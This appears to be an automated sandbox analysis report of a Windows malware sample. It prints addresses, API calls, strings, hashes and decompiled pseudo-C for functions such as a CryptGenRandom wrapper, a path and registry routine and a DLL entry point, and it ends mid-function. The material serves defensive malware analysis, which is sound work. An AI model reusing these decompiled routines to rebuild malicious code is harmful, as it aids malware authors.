0x00e5e80a
0x00e5e817
0x00e5e819
0x00e5e81e
0x00e5e81e
0x00e5e825
0x00e5e836
0x00e5e83b
0x00e5e83d
0x00e5e83d
0x00e5e851
0x00e5e863
0x00e5e865
0x00e5e868
0x00e5e86d
0x00e5e86d
0x00e5e874
0x00e5e883
0x00e5e887
0x00e5e8c5
0x00e5e8ca
0x00e5e8d2
0x00e5e8d7
0x00e5e8e2
0x00e5e8e8
0x00e5e8f2
0x00e5e8f5
0x00e5e8fe
0x00e5e903
0x00e5e903
0x00e5e90c
0x00e5e955
0x00e5e957
0x00e5e95e
0x00e5e95f
0x00e5e962
0x00e5e968
0x00e5e96c
0x00e5e96d
0x00e5e972
0x00e5e974
0x00e5e97a
0x00e5e98f
0x00e5e997
0x00e5e9cc
0x00e5e9d1
0x00e5e9d6
0x00000000
0x00e5e9d8
0x00e5e999
0x00e5e99b
0x00e5e99b
0x00e5e9a4
0x00e5e9a7
0x00e5e9a9
0x00e5e9ab
0x00e5e9b1
0x00e5e9b1
0x00e5e9b6
0x00e5e9b8
0x00e5e9bf
0x00e5e9bf
0x00000000
0x00e5e9c2
0x00e5e97c
0x00e5e984
0x00000000
0x00e5e90e
0x00e5e90e
0x00e5e914
0x00e5e91a
0x00e5e91d
0x00000000
0x00e5e91d
0x00e5e90c
0x00e5e889
0x00e5e88f
0x00e5e893
0x00e5e894
0x00e5e899
0x00e5e89b
0x00e5e8a1
0x00e5e8bf
0x00e5e8bf
0x00000000
0x00e5e8bf
0x00e5e8a3
0x00e5e8ad
0x00e5e8af
0x00e5e8b0
0x00e5e8b5
0x00e5e8b7
0x00e5e8bd
0x00000000
0x00000000
0x00000000
0x00e5e876
0x00e5e876
0x00e5e91f
0x00e5e91f
0x00e5e925
0x00e5e928
0x00000000
0x00e5e928
0x00e5e827
0x00e5e827
0x00e5e92a
0x00e5e92a
0x00e5e930
0x00e5e933
0x00000000
0x00e5e933
0x00e5e825
0x00e5e790
0x00e5e935
0x00e5e938
0x00e5e93a
0x00e5e93d
0x00e5e940
0x00e5e949
0x00e5e94e
0x00000000
0x00000000
0x00e5e952
0x00000000
0x00e5e952
0x00e5e75f
0x00000000

APIs

memset.MSVCRT ref: 00E5E6A5
memset.MSVCRT ref: 00E5E6B6
memset.MSVCRT ref: 00E5E70B
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 00E5E790

Strings

POST, xrefs: 00E5E856

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 9ac4c8cb652c7876c55880ab37520042115c07365bf312f92fd6cea06cd6aae3
Instruction ID: 52c433c5f8857f746151e236b9a182ff907c17a43fde6af3e077c170f327c76b
Opcode Fuzzy Hash: 9ac4c8cb652c7876c55880ab37520042115c07365bf312f92fd6cea06cd6aae3
Instruction Fuzzy Hash: EBB16C71900208EFDB14DFA5DC88AEE7BB8EF48341F104469F905FB290DBB49A49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E616C3, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00E616C3(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

0x00e616cc
0x00e616d3
0x00e616dc
0x00e616e0
0x00e6175b
0x00000000
0x00e6175d
0x00e616ee
0x00e616f0
0x00e616f5
0x00000000
0x00000000
0x00e616fd
0x00e616ff
0x00e61704
0x00000000
0x00000000
0x00e6170e
0x00e61712
0x00000000
0x00000000
0x00e61714
0x00e61719
0x00e6171b
0x00e6171c
0x00e61720
0x00e61726
0x00000000
0x00000000
0x00e61731
0x00e6173a
0x00e6173e
0x00000000
0x00000000
0x00e61740
0x00e61742
0x00e6174a
0x00e6174c
0x00e6174d
0x00e61755
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,00E57640,?,?,00000000,?), ref: 00E616D6
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00E616EE
GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 00E616FD
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00E6170C

Strings

advapi32.dll, xrefs: 00E616CE
CryptGenRandom, xrefs: 00E616F7
CryptAcquireContextA, xrefs: 00E616E8
CryptReleaseContext, xrefs: 00E61706

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 382de728ceaf7398f6dd06d3bb58e7145bd5af8d201a289de027c0997728e5cf
Instruction ID: bf48341045690619f82100034eee5eaf329774a1218c8a9c9a0855f37a473d72
Opcode Fuzzy Hash: 382de728ceaf7398f6dd06d3bb58e7145bd5af8d201a289de027c0997728e5cf
Instruction Fuzzy Hash: D711EB31A80719BBDB125BB6AC94EBF7BB9EF45784F0404A5E601F3141DE70EA008754

Uniqueness

Uniqueness Score: -1.00%

Function 00E6212D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00E6212D(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L00E62290();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L00E622D8();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E00E586EC(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0xe609bd
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

0x00e62130
0x00e62135
0x00e62139
0x00e62139
0x00e6213e
0x00e62143
0x00e62144
0x00e62147
0x00e62148
0x00e6214d
0x00e62150
0x00e62151
0x00e62156
0x00e6215d
0x00e62203
0x00e62203
0x00000000
0x00e6216c
0x00e6216c
0x00e62173
0x00e62177
0x00e6217e
0x00e62187
0x00e62189
0x00e62189
0x00e62187
0x00e62198
0x00e621be
0x00e621c7
0x00e621c9
0x00e621cf
0x00e621fe
0x00e621fe
0x00e62206
0x00e62209
0x00e62209
0x00e621d1
0x00e621d2
0x00e621d8
0x00e621da
0x00e621da
0x00e621df
0x00e621de
0x00e621de
0x00e621e6
0x00e621f2
0x00e621fc
0x00e621fc
0x00000000
0x00e621a8
0x00e621a8
0x00e621a8
0x00e621ae
0x00000000
0x00000000
0x00e621b0
0x00e621b6
0x00e621bb
0x00000000
0x00e621bb
0x00e62198

APIs

_snprintf.MSVCRT ref: 00E62151
localeconv.MSVCRT ref: 00E6216C
strchr.MSVCRT ref: 00E6217E
strchr.MSVCRT ref: 00E6218F
strchr.MSVCRT ref: 00E6219D
strchr.MSVCRT ref: 00E621C2

Strings

%.*g, xrefs: 00E62148

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: 03787e576d6c367053676d438299eabc05c85c920a023f15d90e0223c3df8baf
Instruction ID: 7b71ca783b0aefb5e122e0409623cfb574486e526ae08d0da06c24c263bab2a1
Opcode Fuzzy Hash: 03787e576d6c367053676d438299eabc05c85c920a023f15d90e0223c3df8baf
Instruction Fuzzy Hash: B52168766C8E062AD7245A28BC91BA777CCDB027B4F14351DFF10BB1A2D664DD4083A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E602BD, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 00E6033D
qsort.MSVCRT ref: 00E605BB

Strings

%I64d, xrefs: 00E6032F
false, xrefs: 00E60320
true, xrefs: 00E60314
null, xrefs: 00E60302

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: d615f194bfd598907900493340e545e4fef52fb6396b19e9ee48a8ae0a1b3772
Instruction ID: c9abe43931b601d0a7b29882f3f2c3c8687f1f3f84015087ab5bf17c9ee64036
Opcode Fuzzy Hash: d615f194bfd598907900493340e545e4fef52fb6396b19e9ee48a8ae0a1b3772
Instruction Fuzzy Hash: B7E1BE7198021ABFDF11AF64EC42EAF3BA9EF553C4F005025FD15B6251EA31DA618BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E54A0C, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00E54A0C(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0xe6e688; // 0xe80000
					_t125 =  *0xe6e68c; // 0x510f890
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E00E5BB73(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E00E5B78E(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E00E5B663(_t66,  &_v1076, _t206, _t208);
					_t129 = E00E549C8( &_v1076,  &_v1076, _t206);
					_t141 = E00E5D40B( &_v1076, E00E5C384( &_v1076), 0);
					E00E5B870(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E00E52C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E00E592CB(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0xe6e688; // 0xe80000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E00E591C9(_v1112);
								_t145 = _t130;
								 *0xe6e740 = _t76;
								 *0xe6e738 = E00E591C9(_t145);
								L17:
								_push(_t145);
								_t188 = E00E59B29( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0xe6b9c2);
								E00E59F2E(0xe);
								E00E59F52(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E00E5A091(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E00E5A3D3(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E00E5A3D3(_t188, _t180, _t208);
								}
								_t87 = E00E597F2(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E00E5A091(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0xe6e688; // 0xe80000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E00E5FC2A(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0xe6e688; // 0xe80000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E00E5E249(_t183);
										}
										E00E552A8( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0xe6e688; // 0xe80000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E00E5109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E00E585BB( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xe80228
									_t153 = _t51;
									L25:
									_t90 = E00E55527(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0xe6e688; // 0xe80000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E00E5C29D(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0xe6e684; // 0x510f6c8
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0xe6e684; // 0x510f6c8
								 *((intOrPtr*)(_t109 + 0x30))();
								E00E58600( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E00E58600( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E00E5E291(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E00E595C7(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E00E5BFF7(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E00E585BB( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E00E52BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x00e54a0c
0x00e54a19
0x00e54a24
0x00e54a29
0x00e54a2b
0x00e54a2e
0x00e54a33
0x00e54a36
0x00e54a40
0x00e54a42
0x00e54a4f
0x00e54a58
0x00e54a58
0x00e54a65
0x00e54a80
0x00e54a87
0x00e54a89
0x00e54a8e
0x00e54a93
0x00e54a99
0x00e54aa8
0x00e54ac7
0x00e54ac9
0x00e54acf
0x00e54ad5
0x00e54ada
0x00e54ade
0x00e54ae1
0x00e54aeb
0x00e54aed
0x00e54aee
0x00e54af9
0x00e54afb
0x00e54afe
0x00e54b03
0x00e54b0a
0x00e54b5f
0x00e54b5f
0x00e54b64
0x00e54bcb
0x00e54bd0
0x00e54bd2
0x00e54bdc
0x00e54be1
0x00e54be1
0x00e54bfb
0x00e54bfd
0x00e54c00
0x00e54c02
0x00000000
0x00000000
0x00e54c08
0x00e54c12
0x00e54c1b
0x00e54c20
0x00e54c23
0x00e54c29
0x00e54c2f
0x00e54c37
0x00e54c39
0x00e54c3c
0x00e54c3d
0x00e54c42
0x00e54c45
0x00e54c48
0x00e54c4a
0x00e54c4e
0x00e54c4e
0x00e54c53
0x00e54c56
0x00e54c58
0x00e54c5c
0x00e54c5c
0x00e54c63
0x00e54c68
0x00e54c6a
0x00e54c6e
0x00e54c70
0x00e54c76
0x00e54c7a
0x00e54c7d
0x00e54c7e
0x00e54c83
0x00e54c86
0x00e54c8b
0x00e54cb3
0x00e54cb9
0x00e54cc0
0x00e54ccf
0x00e54cd4
0x00000000
0x00e54cd4
0x00e54cc2
0x00000000
0x00e54c8d
0x00e54c8d
0x00e54c92
0x00e54c99
0x00e54cde
0x00e54cde
0x00e54ce5
0x00e54ce9
0x00e54cea
0x00e54cea
0x00e54cf4
0x00e54cf9
0x00e54cfc
0x00e54cfd
0x00e54cff
0x00e54d01
0x00e54d06
0x00e54d0d
0x00e54d50
0x00e54d0f
0x00e54d14
0x00e54d1c
0x00e54d20
0x00e54d2b
0x00e54d36
0x00e54d3e
0x00e54d42
0x00e54d4a
0x00e54d4a
0x00e54d0d
0x00e54d56
0x00e54d59
0x00e54d5b
0x00e54d61
0x00e54d61
0x00e54d63
0x00e54d63
0x00000000
0x00e54d63
0x00e54c9b
0x00e54c9b
0x00e54ca1
0x00e54ca3
0x00e54ca8
0x00e54ca8
0x00e54caa
0x00e54cd9
0x00000000
0x00e54cd9
0x00e54cac
0x00e54ae5
0x00e54ae5
0x00000000
0x00e54ae5
0x00e54c8b
0x00e54b6a
0x00e54b78
0x00e54b8b
0x00e54b90
0x00e54b96
0x00e54b98
0x00e54bb0
0x00e54bb5
0x00e54bbe
0x00e54bc4
0x00000000
0x00e54bc4
0x00e54ba0
0x00e54ba9
0x00000000
0x00e54ba9
0x00e54b0c
0x00e54b12
0x00e54b14
0x00e54b52
0x00e54b54
0x00000000
0x00000000
0x00e54b56
0x00e54b5a
0x00000000
0x00e54b5a
0x00e54b16
0x00e54b20
0x00e54b2c
0x00e54b37
0x00e54b3e
0x00e54b48
0x00e54b4d
0x00000000
0x00e54b4d
0x00e54ae3
0x00000000
0x00e54a67
0x00e54a72
0x00e54a78
0x00e54a7a
0x00e54d65
0x00e54d65
0x00e54d67
0x00e54d6d
0x00e54d6d
0x00000000
0x00e54a7a

APIs

memset.MSVCRT ref: 00E54A2E
lstrcpyW.KERNEL32(00000000,00000000), ref: 00E54D20
lstrcatW.KERNEL32(00000000,?), ref: 00E54D3E
lstrcatW.KERNEL32(00000000,00000000), ref: 00E54D42
lstrcatW.KERNEL32(00000000,00E6B994), ref: 00E54D4A
lstrcpyW.KERNEL32(00000000,00000000), ref: 00E54D50

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: 9f13834be487d8c43da45f976545d92927a686be94b870b6b1d517919b95429a
Instruction ID: 99811868910b68cbfe016ed87678507907a5e234ffcb3787f8eb63ca0337c7eb
Opcode Fuzzy Hash: 9f13834be487d8c43da45f976545d92927a686be94b870b6b1d517919b95429a
Instruction Fuzzy Hash: A391B271604300AFE714EB20D846BBB73E5ABC471AF145D2DF955BB2D1EBB0984C8B52

Uniqueness

Uniqueness Score: -1.00%

Function 00E55F6A, Relevance: 9.1, APIs: 6, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 77%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t20;
				struct HINSTANCE__* _t23;
				long _t24;
				long _t25;
				char* _t29;
				WCHAR* _t34;
				long _t35;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t42;
				void* _t52;
				int _t56;
				void* _t57;
				intOrPtr* _t58;
				void* _t60;

				_t52 = __edx;
				if(_a8 != 1) {
					if(_a8 == 0) {
						_t42 =  *0xe6e684; // 0x510f6c8
						 *((intOrPtr*)(_t42 + 0xc8))( *0xe6e6a8, 0);
					}
					L15:
					return 1;
				}
				E00E585D5();
				_t20 = E00E597F2( &_v16);
				_t60 = _t52;
				if(_t60 < 0 || _t60 <= 0 && _t20 < 0x2e830) {
					goto L15;
				} else {
					E00E58F5E();
					GetModuleHandleA(0);
					_t23 = _a4;
					 *0xe6e69c = _t23;
					_t24 = GetModuleFileNameW(_t23,  &_v664, 0x104);
					_t25 = GetLastError();
					if(_t24 == 0 || _t25 == 0x7a) {
						L10:
						return 0;
					} else {
						memset( &_v144, 0, 0x80);
						_t58 = _t57 + 0xc;
						_t56 = 0;
						do {
							_t29 = E00E595AD(_t56);
							_a8 = _t29;
							MultiByteToWideChar(0, 0, _t29, 0xffffffff,  &_v144, 0x3f);
							E00E585A8( &_a8);
							_t56 = _t56 + 1;
						} while (_t56 < 0x2710);
						E00E62A66( *0xe6e69c);
						 *_t58 = 0x7c3;
						 *0xe6e684 = E00E5E1C7(0xe6ba20, 0x11c);
						 *_t58 = 0xb4e;
						_t34 = E00E595C7(0xe6ba20);
						_a8 = _t34;
						_t35 = GetFileAttributesW(_t34);
						_push( &_a8);
						if(_t35 == 0xffffffff) {
							E00E585BB();
							_v8 = 0;
							_t39 =  *0xe6e684; // 0x510f6c8
							_t40 =  *((intOrPtr*)(_t39 + 0x70))(0, 0, E00E55DEE, 0, 0,  &_v8);
							 *0xe6e6a8 = _t40;
							if(_t40 != 0) {
								goto L15;
							}
							goto L10;
						}
						E00E585BB();
						goto L10;
					}
				}
			}

0x00e55f6a
0x00e55f79
0x00e560a6
0x00e560a8
0x00e560b6
0x00e560b6
0x00e560bc
0x00000000
0x00e560be
0x00e55f7f
0x00e55f87
0x00e55f8e
0x00e55f90
0x00000000
0x00e55fa3
0x00e55fa3
0x00e55fa9
0x00e55faf
0x00e55fbf
0x00e55fc4
0x00e55fcc
0x00e55fd4
0x00e56075
0x00000000
0x00e55fe3
0x00e55ff0
0x00e55ff5
0x00e55ff8
0x00e55ffa
0x00e55ffc
0x00e56009
0x00e56012
0x00e5601b
0x00e56020
0x00e56021
0x00e5602f
0x00e56039
0x00e5604a
0x00e5604f
0x00e56056
0x00e5605d
0x00e56060
0x00e5606c
0x00e5606d
0x00e56079
0x00e56082
0x00e56086
0x00e56094
0x00e56097
0x00e5609e
0x00000000
0x00000000
0x00000000
0x00e560a0
0x00e5606f
0x00000000
0x00e56074
0x00e55fd4

APIs

Part of subcall function 00E585D5: HeapCreate.KERNELBASE(00000000,00080000,00000000,00E55F84), ref: 00E585DE

Part of subcall function 00E597F2: GetSystemTimeAsFileTime.KERNEL32(?,?,00E55F8C), ref: 00E597FF

GetModuleHandleA.KERNEL32(00000000), ref: 00E55FA9
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00E55FC4
GetLastError.KERNEL32 ref: 00E55FCC
memset.MSVCRT ref: 00E55FF0
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00E56012
GetFileAttributesW.KERNEL32(00000000), ref: 00E56060

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: File$ModuleTime$AttributesByteCharCreateErrorHandleHeapLastMultiNameSystemWidememset
String ID:
API String ID: 3148476078-0
Opcode ID: 76831b924017d770b1a33454c0cd78b23568a8a49ca3cc9927bf4ae43ea16354
Instruction ID: 42178648cf6201ba6e2ecae55b76735685db6dfa04a8f0962a4714a177b1563a
Opcode Fuzzy Hash: 76831b924017d770b1a33454c0cd78b23568a8a49ca3cc9927bf4ae43ea16354
Instruction Fuzzy Hash: 1631E571900104EFDB20AB21ED49E9E37B8EB44762F109929FC15B72D1EFB4494DCB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E5D753, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00E5D767
SysAllocString.OLEAUT32(?), ref: 00E5D76F
SysAllocString.OLEAUT32(00000000), ref: 00E5D783
SysFreeString.OLEAUT32(?), ref: 00E5D7FE
SysFreeString.OLEAUT32(?), ref: 00E5D801
SysFreeString.OLEAUT32(?), ref: 00E5D806

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 6d333ba07e9dad74dd3f932b3856360bea73d908230e122f9c5406b9c3684891
Instruction ID: 5dd289ae2817c2973d805c6f1996cf94534227a30cd3a8901e5d9fc4b417e75a
Opcode Fuzzy Hash: 6d333ba07e9dad74dd3f932b3856360bea73d908230e122f9c5406b9c3684891
Instruction Fuzzy Hash: 7A21F875900218BFDB10DFA9CC88DAFBBBDEF48358B10449AF505A7250DA70AE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E60802, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

\u%04X\u%04X, xrefs: 00E6095B
\u%04X, xrefs: 00E6091C
@, xrefs: 00E60870

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 97873b698bf197bff0979668e0b537510b37d5025332c37f4c7359b34de9af13
Instruction ID: e3911b6ec483a66547d971c38306463184b8f52fbe459e822f70e73a51f5a6ea
Opcode Fuzzy Hash: 97873b698bf197bff0979668e0b537510b37d5025332c37f4c7359b34de9af13
Instruction Fuzzy Hash: 394108716C02259BEB2CCDA8BD8AABF7766DFC13E4F182125F942F7242D6618D5083D1

Uniqueness

Uniqueness Score: -1.00%

Function 00E5D52E, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00E5D52E(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
